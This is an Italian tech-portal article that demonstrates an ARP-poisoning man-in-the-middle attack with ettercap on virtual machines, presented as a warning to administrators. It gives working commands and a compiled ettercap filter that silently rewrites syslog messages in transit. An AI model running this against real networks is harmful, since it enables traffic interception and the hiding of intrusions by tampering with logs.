Home Tecnica Sicurezza ettercap: il man-in-the-middle facile

In evidenza

I riflettori della Fiera del Levante si accendono su SMAU Bari 2012

I riflettori della Fiera del Levante si accendono su SMAU Bari 2012

Dal 15 al 16 febbraio nel Nuovo Padiglione della Fiera del Levante, la quarta edizione di Smau sarà dedicata ...
TecnoWorkshop Lucca2011

TecnoWorkshop Lucca2011

Finalmente, e dopo un po' di peripezie siamo riusciti ad organizzare il primo TecnoWorkshop del nostro...
Società Italiana dei Professionisti delle Scienze dell'Informazione

Società Italiana dei Professionisti delle Scienze dell'Informazione

La Società Italiana dei Professionisti delle Scienze dell'Informazione (acronimo SIPSI) è una associazione...
Testata Giornalistica

Testata Giornalistica

Il portale Professionisti e Consulenti ICT - Italia è ora una testata giornalistica a tutti gli effetti...

Bandi di Concorso

  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 7

Concorso pubblico per informatico alla Corte dei Conti

E' indetto un concorso pubblico, per   esami,   per   il reclutamento di tre unità di informatici da inquadrare nella III area, fascia retributiva F1, da destinare agli Uffici della Corte dei Conti con sede in Roma. Requisiti: laurea triennale in scienze e...

05 Feb 2012 - Letture:81

Istruttore informatico L.68/1999 al Comune di Potenza

Concorso pubblico, per esami, per la copertura di n. 2 posti di Istruttore Informatico, categoria C, posizione economica C1, a tempo pieno e indeterminato, con riserva assoluta alle categorie dilavoratori di cui all'art. 1 della legge n. 68/1999 (norme per...

21 Gen 2012 - Letture:86

Senior Business Consultant presso Lombardia Informatica

Selezione per figura Senior Business Consultant presso Lombardia Informatica. Il collaboratore dovrà fornire consulenza strategica e di business sulle tematiche verticali della Socio-Sanità. Requisiti di ammissione: Laurea in Ingegneria, Economia e Commercio o Scienze dell’Informazione; Percorsi di formazione professionale in ambito sanitario e socio-sanitario, su...

11 Gen 2012 - Letture:140

Bando progetto TAG (Toscana Area Giovani) per giovani talenti digitali

UPI Toscana ha indetto un avviso pubblico per la selezione di 20 giovani (2 per ciascuna delle 10 province della Toscana), da impiegare come formatori all'interno del Progetto TAG (Toscana Area Giovani). Il bando è finalizzato a valorizzare al meglio i...

03 Gen 2012 - Letture:147

Avviso pubblico per giovani dottori di ricerca per Uffici di Gabinetto

Avviso pubblico per il conferimento di n. 6 incarichi presso gli Uffici di diretta collaborazione del Ministro dell'istruzione dell'università e della ricerca, per soggetti estranei alla pubblica amministrazione. Ambiti di esperienza e Aree di competenza: Nuovi Media: nuove forma di comunicazione tra...

02 Gen 2012 - Letture:101

Database Administrator in the Information Technology (IT) Department at CERN

E' aperta una posizione nel gruppo di lavoro che fornisce servizi Database e Middleware al CERN, un'organizzazione internazionale che fa fisica delle particelle di stanza a Ginevra, Svizzera. Direttamente dal sito del bando si legge: as Database Administrator in the Database...

12 Dic 2011 - Letture:154

Posto per collaboratore tecnico CROB a Rionero in Vulture (PZ)

Indetto pubblico concorso, per titoli ed esami, per la copertura di un posto di collaboratore tecnico professionale esperto - Ingegnere - Cat. DS presso il centro di riferimento oncologico della Basilicata in Rionero in Vulture (PZ).

22 Nov 2011 - Letture:259

I più attivi

Dati e punteggi dell'ultimo anno

Giovanna Casamassima Giovanna Casamassima
47 articoli
12,694 punti totali
Rodolfo Giometti Rodolfo Giometti
45 articoli
6,855 punti totali
Vittorio D'Aversa Vittorio D'Aversa
34 articoli
3,039 punti totali
Fulvio Lucchetti Fulvio Lucchetti
11 articoli
0,552 punti totali
Fabio Bronzini Fabio Bronzini
12 articoli
0,501 punti totali

Ci hanno visitato

Oggi:2168
Ieri:2515
Totali (14/04/09):927651

I nostri numeri

Articoli pubblicati: 519
Iscritti al portale: 677
Iscritti all'Elenco: 175
Iscritti ML Discussioni: 333
Iscritti ML Articoli: 28
Iscritti ML Lavoro: 166
 

Perché cross compilare quando si può compilare nativamente?

Lavorando con architetture diverse mi trovo spesso a dover utilzzare uno stesso ...

L'SMS autoprodotto!

Tempo fa sulla mailing list di CFI ho provato a lanciare l'idea di effettuare un...

WODE, l'emulatore DVD per la Wii

Qualche giorno fa mi è capitato di sfidare mio cognato ad una partitella a tenni...

Verificare spazio su disco su UNIX

Nella gestione si sistemi informativi capita spesso di accedere a postazioni ser...

Forno a microonde: analisi emissioni EME

Nell'immaginario collettivo c'è una forte paura per i danni che posso generare s...

Socat: quando i dati passano via rete

Lavorando coi sistemi embedded molte volte mi capita di dovermi arrangiare su di...

Mageia 1 alpha1 è tra noi

Finalmente è stata rilasciata la tanto attesa versione alpha1 principalmente riv...

Gobby: l'editor collaborativo

Quante volte vi sarà capitato di dover dire come modificare un file di testo ad ...

Linaro, la no-profit che produce distribuzioni Linux/ARM

Il progetto Linaro presentato nel 2010 da colossi del calibro di Freescale Semic...

munin: come ti controllo il server aziendale

In questi ultimi tempi il server che mantiene il nostro portale è sottoposto ad ...

Demolinux: l'automazione industriale con Linux

Qualche tempo fa il mio ex istituto superiore mi aveva chiesto di fare una picco...

LIM: la lavagna multimediale con il wiimote

LIM sta per Lavagna Interattiva Multimediale, ed è un progetto che, tramite l'...

Autenticarsi con la pen drive

La pen drive è ormai diventata come il cellulare, impossibile non averla, ma sie...

Odroid: la piattaforma di gioco libera

Si chiama Odroid ed e basata su Android, è la prima piattaforma di gioco interam...

AccessPoint: la scelta ottimale del canale di trasmissione

Realizzare una rete Wireless outdoor (ma anche indoor) pone il problema della sc...

Sicurezza informatica: safety, dependability, security

La sempre maggiore diffusione delle tecnologie ha profondamente rivoluzionato la...

Come gestire una presentazione con il Wiimote

Capitandomi spesso si tenere conferenze e workshop mi trovo sempre il problema d...

TurnKey Linux: accendi e vai!

Quanto tempo occorre per installare e configurare una macchina LAMP (Linux, Apac...

Android-x86: quando il drone sbarca sui PC

Chi pensa che Andoird abbia vita bere farà bene a ricredersi perché, oltre alle ...

Implementare una LIM con Linux

Come promesso rieccomi qui per illustrare come realizzare una LIM (che ricordo s...

Cluster VMWARE

In questo articolo vediamo come realizzare un cluster di macchine virtuali con u...

Anomalie di partizionamento hard disk: un esperienza personale

Nonostante le decine di installazioni delle varie distribuzioni Linux eseguite s...

Integrazione Webmaster Tool. Google Analytics, le ultime novità

Google non finisce mai di stupirci, ma soprattutto è inarrestabile sull'implemen...

Code Smells

Sempre più spesso il codice ha un cattivo odore. Sei sicuro di non scrivere cod...

Boot from SAN

Intendiamoci, non è l’ultima briciola tecnologica caduta da un banchetto alla NA...

Intervista esclusiva a Mageia Linux

La Presidente dell'Associazione MAGEIA.ORG, Anne Nicolas, in questa intervi...

Il telefono… la tua voce!

Era lo slogan pubblicitario della Telecom di un po’ di anni fa. Certo, al concet...

Linutop OS 4.0: Internet, Chiosco Multimediale e non solo!

Presentata negli ultimi giorni nella capitale francese la nuova distribuzione LI...

ASUS U36SD il notebook in soli 19mm

La concorrenza al più blasonato della “mela” si fa agguerrita specie nell'ultimo...

Gimp, OpenOffice & C. su N900? Semplice con Debian!

Che Maemo fosse versatile me ne sono accorto subito, ma l'idea di poter installa...

I-Memo: le password personali sempre con te

Prodotto dalla MensTecnica, una giovane azienda della Basilicata fondata nel 200...

Installare Linux su una USB key: ecco come!

L’installazione  e l'avvio di una distribuzione Linux Live da un supporto U...

OpenWRT: la distribuzione piccola e versatile

In queste ultime settimane ho avuto modo di vedere da vicino OpenWRT, una distri...

Sabayon Linux 5.4 (32 e 64 bit)

E' stata rilasciata online la nuova versione 5.4 di Sabayon Linux, una tra ...

Universal USB Installer 1.8.04 e Ubuntu Linux 10.10

Rilasciata il 10.10(.2010) la nuova versione di Ubuntu Linux (la data corrispond...

Openembedded: la distribuzione «ristretta» per Linux

Quando le risorse di un sistema sono limitate non è possibile usare una distribu...

Il NAS D-Link DNS-343

Grazie alla D-Link azienda produttrice di apparecchiature di rete e non solo v...

Come creare un NFS server ridondante

Quelli che mi conoscono sanno che il mio ambito lavorativo è nei sistemi embedde...

GNU readline: un tool indispensabile per la linea di comando

Chiunque di voi abbia avuto a che fare con la linea di comando avrà senz'altro a...

Clonare una macchina vera in 30 minuti con VirtualBox

Essendo uno sviluppatore mi son reso conto che la virtualizzazione di una macchi...

Sviluppare codice per Arduino dalla command line

Arduino Uno è un micro controllore basato su CPU ATmega328; si alimenta via alim...

Come saltare il proxy «blocca-tutto» aziendale

Mi capita spesso, ma non sempre, di andare da dei miei clienti e non potermi con...

Rete lenta? Vediamo chi consuma...

Molte volte capita di trovarsi la rete molto lenta e magari non abbiamo a dispos...

Cifratura wireless: TKIP vs AES

Una delle domande più frequenti di chi intende implementare una rete Wireless è...

Il settore danneggiato e l'acquisizione forense

Se si deve acquisire un hard disk in maniera forense, ossia con tutti i crismi n...

Multi puntatore su Ubuntu 10.4: ecco come

Tempo fa ebbi modo di dare un'occhiata al progetto MPX per un cliente. La cosa n...

ettercap: il man-in-the-middle facile

Troppo spesso mi rendo conto che molti considerano la rete aziendale o quella ...

SL4A e il drone parla più lingue

Chi come me non ama Java si sentirà a disagio volendo programmare una qualsiasi ...

Multistrap: come ti creo un rootfs Debian dal nulla

Una volta c'era debootstrap, un tool fantastico che permetteva di creare un root...

Server Linux: tutti i trucchi per farlo al meglio

Volete fare un server Linux per la vostra impresa, ufficio o semplicemente per c...

Architettura di una trading room

La trading room o sala mercati è il luogo dove vengono effettuate le operazioni ...

Lion desktop: finalmente una distribuzione mirata alle aziende!

Chi è abituato a lavorare con Linux, ed in particolare ha provato a lavorare con...

busybox & Android: la command line facile

Nei precedenti articoli abbiamo visto due tecniche per aggiungere nuovi programm...

Arduracing: come realizzare una robot-car intelligente con Arduino

Arduracing è un progetto realizzato con Arduino in collaborazione con il Lucccal...

Linutop4 PC

Il produttore francese Linutop, con sede a Parigi, ha annunciato il nuovo modell...

"Impronte digitali" anche per le macchine fotografiche

Da www.hwupgrade.it: Una ricerca della Binghamton University ha messo a punto u...

Geexbox: la mini distro MediaCenter Linux

Geexbox è un piccolo ma potente sistema operativo orientato alla riproduzione di...

Boxee Box: la TV facile di D-Link

Grazie alla D-Link possiamo presentare un nuovo gioiello della tecnologia: il me...

Grep e Strings due giganti di Linux

Il tempo libero serve anche a sperimentare e quando si ha la passione per la com...

NBTempo: una GUI per le timeline

Svolgendo alcuni casi in cui serviva creare delle timeline per verificare l'att...

ettercap: il man-in-the-middle facile Stampa E-mail
(1 voto, media 5.00 di 5)
Area Tecnica - Sicurezza
Scritto da Rodolfo Giometti   
Domenica 29 Agosto 2010 14:34
Articolo letto 2233 volte

logo

Troppo spesso mi rendo conto che molti considerano la rete aziendale o quella casalinga come sicura, pensando cioè che nessuno possa sapere quello che entra ed esce da e verso il proprio PC. Si pensa cioè che nessuno possa intercettare i nostri dati.

Ovviamente questo non è vero... a meno che non si usino trasmissioni basate su sistemi crittografici ben testati e liberamente studiabili per proteggere le proprie comunicazioni. In questo caso infatti le possibilità di essere intercettati è praticamente nulla.

Si noti che ho detto intenzionalmente «liberamente studiabili», sì perché un sistema è sicuro solo se è dimostrato che è sicuro e non perché ce lo assicura qualcuno... men che meno chi ce lo vuol vendere (mai fidarsi dei venditori! n.d.a. :). Di solito i sistemi basati sul Software Libero hanno questa caratteristica perché sono gli unici che possono essere validati da chiunque a partire dal codice sorgente fino al processo di compilazione.

Per sottolineare quanto detto, e quindi dimostrare come sia facile effettuare un banale attacco informatico in una LAN aziendale e/o casalinga userò ettercap. Con ettercap è possibile realizzare un attacco di tipo man-in-the-middle in una rete LAN dimostrando così molto velocemente come questa non sia assolutamente sicura se non si prendono le dovute precauzioni.

Naturalmente è possibile usare ettercap non solo per azioni cattive, ma anche per quelle buone: è possibile infatti usarlo anche per scoprire altri attacchi di tipo man-in-the-middle e proteggere quindi la propria LAN!

Quello che vi mostrerò in questo articolo serve solo per fare un esempio di quello che potrebbe succedere se non si protegge la propria LAN in maniera opportuna e non va inteso in nessun modo come un esempio di come compiere azioni illegali! Al contrario, serve a far vedere agli amministratori di sistema distratti da cosa si devono difendere!

Come esempio vediamo come taroccare i messaggi di log che un sistema può inviare ad un server il quale ha il compito di memorizzarli sui sui dischi interni per successive analisi da parte degli amministratori di rete. Questo sistema di invio dei log è standard su molti sistemi ma purtroppo presenta gravi lacune di sicurezza non utilizzando nessun sistema di crittazione e/o autenticazione per lo scambio dati!

Ma procediamo passo passo ed installiamoci ettercap; sulla mia ubuntu do semplicemente:

# aptitude install ettercap

e poi facciamo alcune supposizioni:

  1. Per effettuare l'attacco man-in-the-middle dobbiamo avere un PC nella sottorete da attaccare; supponiamo di avere una LAN di classe C con indirizzi nella sottorete 192.168.56.0/24.
  2. Supponiamo poi di sapere quale sia l'IP del server che raccoglie i log dei sistemi apparteneti alla sottorete; nel nostro caso 192.168.56.4.
  3. Il nostro attacco, in fine, si baserà sul modificare i log che un host invia al server; supponiamo che il suo IP sia 192.168.56.3.

Il punto 1. sembra molto difficile da realizzare, ma in realtà non lo è; infatti in molti casi gli attacchi ad un sistema informatico avvengono proprio da dentro la LAN e non dal di fuori! Nel nostro caso poi il fatto di voler inquinare i messaggi di log di un sistema è voluto proprio da chi sta dentro la LAN in modo da mascherare le (possibili) attività illecite che si vogliono perpretare.

Il punto 2. è anch'esso banale da realizzare. Riuscire a sapere l'IP di un server di un servizio pubblico è molto semplice, addirittura per un dipendente infedele basterà chiederlo all'amministratore di sistema...

Il punto 3. dice quale sarà il tipo di attacco che vogliamo realizzare, ma ne potremmo fare molti altri: carpire password, sniffare e-mail, sapere quali siti web vengono visitati da un PC, ecc..

Appurato questo facciamo uno schema del nostro attacco man-in-the-middle; normalmente la connessione tra il log server e un qualsiasi PC è:

                     +-----------+
                     |    HUB    |
                     +-+-+-+-+-+-+
                       |   |   |
        +--------------+   |   +--------------+
        |                  |                  |
+-------+-----------+      |        +---------+---------+
|    Log Server     ||        PC         |
|   192.168.56.4    |      |        |   192.168.56.3    |
| 08:00:27:E1:B6:C0 |      |        | 08:00:27:6c:b3:7f |
+-------------------+      |        +-------------------+
                           |
                   +-------+-----------+
                   |       MITM        |
                   |   192.168.56.1    |
                   | 0a:00:27:00:00:00 |
                   +-------------------+

In nero ho riportato i collegamenti fisici, mentre in rosso quelli logici (quelli cioè che vengono visti dagli utenti dei vari sistemi). Ho anche riportato la connesione fisica della macchina MITM che uso per eseguire l'attacco man-in-the-middle e dove ho installato ettercap, la quale, al momento, non ha nessun tipo di colloquio coi due sistemi vittima.

In queste condizioni le tabelle ARP dei due sistemi sono, per il log server:

# arp -n
Address                  HWtype  HWaddress           Flags Mask            Iface
192.168.56.3             ether   08:00:27:6c:b3:7f   C                     eth0

mentre per il PC:

# arp -n
Address                  HWtype  HWaddress           Flags Mask            Iface
192.168.56.4             ether   08:00:27:E1:B6:C0   C                     eth0

Ora iniziamo ad analizzare i pacchetti di log che i due sistemi si scambiano generando dei messaggi del tipo:

Aug 26 16:19:56 192.168.56.3 root: System is doing something evil

(per generare questi messaggi ho usato il comando logger)

Quindi abilitiamo l'attacco man-in-the-middle sulla macchina MITM e sniffiamo tutti i pacchetti che le due macchine si scambiano, ettercap ci mostra allora il seguente output:

# ettercap -T -i vboxnet0 -M arp /192.168.56.3/ /192.168.56.4/
[sudo] password for giometti:

ettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGA

Listening on vboxnet0... (Ethernet)

vboxnet0 ->    0A:00:27:00:00:00      192.168.56.1     255.255.255.0

SSL dissection needs a valid 'redir_command_on' script in the etter.conf file
Privileges dropped to UID 65534 GID 65534...

28 plugins
39 protocol dissectors
53 ports monitored
7587 mac vendor fingerprint
1698 tcp OS fingerprint
2183 known services

Scanning for merged targets (2 hosts)...

* |==================================================>| 100.00 %

2 hosts added to the hosts list...

ARP poisoning victims:

GROUP 1 : 192.168.56.3 08:00:27:6C:B3:7F

GROUP 2 : 192.168.56.4 08:00:27:E1:B6:C0
Starting Unified sniffing...


Text only Interface activated...
Hit 'h' for inline help



Thu Aug 26 16:20:01 2010
UDP  192.168.56.3:514 --> 192.168.56.4:514 |

root: System is doing something evil

(non tenete conto delle date, potrebbero non essere coerenti, ciò è dovuto ad errate impostazioni dei timer di sistema e alle varie revisioni dell'articolo... inoltre, come avrete capito, il test l'ho fatto con delle macchine virtuali che girano su Virtualbox)

Se ora andiamo a ricontrollare la tabella ARP del log server:

root@node00:~# arp -n
Address                  HWtype  HWaddress           Flags Mask            Iface
192.168.56.3             ether   0a:00:27:00:00:00   C                     eth0

e del PC:

sarge:~# arp -n
Address                  HWtype  HWaddress           Flags Mask            Iface
192.168.56.4             ether   0A:00:27:00:00:00   C                     eth0

vediamo subito che sono state modificate: l'attacco è quindi in atto! Da ora in poi tutti i pacchetti da e verso i due PC vittima passeranno dal sistema (MITM) che attua l'attacco, si ha cioè una connessione logica (in rosso) del tipo:

                     +-----------+
                     |    HUB    |
                     +-+-+-+-+-+-+
                       |   |   |
        +--------------+   |   +--------------+
        |                  |                  |
+-------+-----------+      |        +---------+---------+
|    Log Server     |      |        |        PC         |
|   192.168.56.4    |      |        |   192.168.56.3    |
| 08:00:27:E1:B6:C0 |      |        | 08:00:27:6c:b3:7f |
+-------------------+      |        +---------+---------+
             ^             |                  ^
             |     +-------+-----------+      |
             |     |       MITM        |      |
             +---->|   192.168.56.1    |<-----+
                   | 0a:00:27:00:00:00 |
                   +-------------------+

Infatti, come mostrato, ettercap ci fa vedere il traffico di rete che intercorre tra le due macchine... ma non solo! Con ettercap lo possiamo anche modificare questo traffico di rete, basta usare un filtro. Un filtro ettercap è un programma scritto in un linguaggio molto simile al C e che può essere usato per analizzare e/o modificare al volo i pacchetti di rete intercettati da ettercap.

Il codice sorgente di un filtro appare come segue:

if (udp.src == 514 || udp.dst == 514) {
        if (search(DATA.data, "evil")) {
                replace("evil", "good");
                msg("string \"evil\" replaced!\n");
        }
}

ed il significato è abbastanza banale: se un pacchetto è di tipo UDP con porta sorgente o destinataria 514 e dentro il campo dati del medesimo pacchetto trovi la stringa evil, rimpiazzala con la stringa good e mostra il messaggio string "evil" replaced! all'utente ettercap.

Ora salviamo il filtro nel file syslog.filter e compiliamolo salvando il compilato del file syslog.filter.ef:

$ etterfilter syslog.filter -o syslog.filter.ef

etterfilter NG-0.7.3 copyright 2001-2004 ALoR & NaGA


12 protocol tables loaded:
DECODED DATA udp tcp gre icmp ip arp wifi fddi tr eth

11 constants loaded:
VRRP OSPF GRE UDP TCP ICMP6 ICMP PPTP PPPoE IP ARP

Parsing source file 'syslog.filter'  done.

Unfolding the meta-tree  done.

Converting labels to real offsets  done.

Writing output to 'syslog.filter.ef'  done.

-> Script encoded into 9 instructions.

quindi rilanciamo ettercap con il nuovo filtro:

# ettercap -T -i vboxnet0 -M arp -F syslog.filter.ef /192.168.56.3/ /192.168.56.4/

Se ora mandiamo un nuovo messaggio di log come già fatto prima, ettercap ci dice:

Thu Aug 26 16:25:41 2010
UDP  192.168.56.3:514 --> 192.168.56.4:514 |

root: System is doing something evil

string "evil" replaced!

mentre il log server ci mostra il messaggio:

Aug 26 16:25:45 192.168.56.3 root: System is doing something good

Il messaggio di log è stato taroccato! Facile no? :)

 

Aggiungi commento

Prima di pubblicare un tuo commento assicurati che:

  • sia in tema e contribuisca alla discussione in corso.

  • non abbia contenuto razzista o sessista.

  • non sia offensivo, calunnioso o diffamante.


La redazione con i controlli a campione si riserva di cancellare qualsiasi contenuto ingiurioso, volgare o illegale.


Nota bene: se non sei registrato il tuo commento verrà moderato e quindi non pubblicato immediatamente. Se, invece, sei registrato al portale e hai fatto login verrà visualizzato subito.


Codice di sicurezza
Aggiorna

 

In primo piano

Simons Voss: un mondo senza chiavi

Simons Voss: un mondo senza chiavi

Il sistema di gestione e di controllo degli accessi 3060 si presenta come un’alternativa con enormi vantaggi...
Pubblicità mirata dei prodotti

Pubblicità mirata dei prodotti

Hai un prodotto o un servizio da pubblicizzare? Fallo su consulenti-ict.it! Pubblicizzare un prodotto...
Recensioni sul Portale

Recensioni sul Portale

Hai un prodotto hardware/software o un libro riguardante uno dei temi dell'ICT? Vuoi farlo conoscere...

Ultime dal Forum

Visualizza Topic »

Eventi

Non ci sono eventi in programma
Febbraio 2012
D L M M G V S
29 30 31 1 2 3 4
5 6 7 8 9 10 11
12 13 14 15 16 17 18
19 20 21 22 23 24 25
26 27 28 29 1 2 3
Marzo 2012
D L M M G V S
26 27 28 29 1 2 3
4 5 6 7 8 9 10
11 12 13 14 15 16 17
18 19 20 21 22 23 24
25 26 27 28 29 30 31

Sondaggi

busyCaricamento Sondaggio...

Ultimi Commenti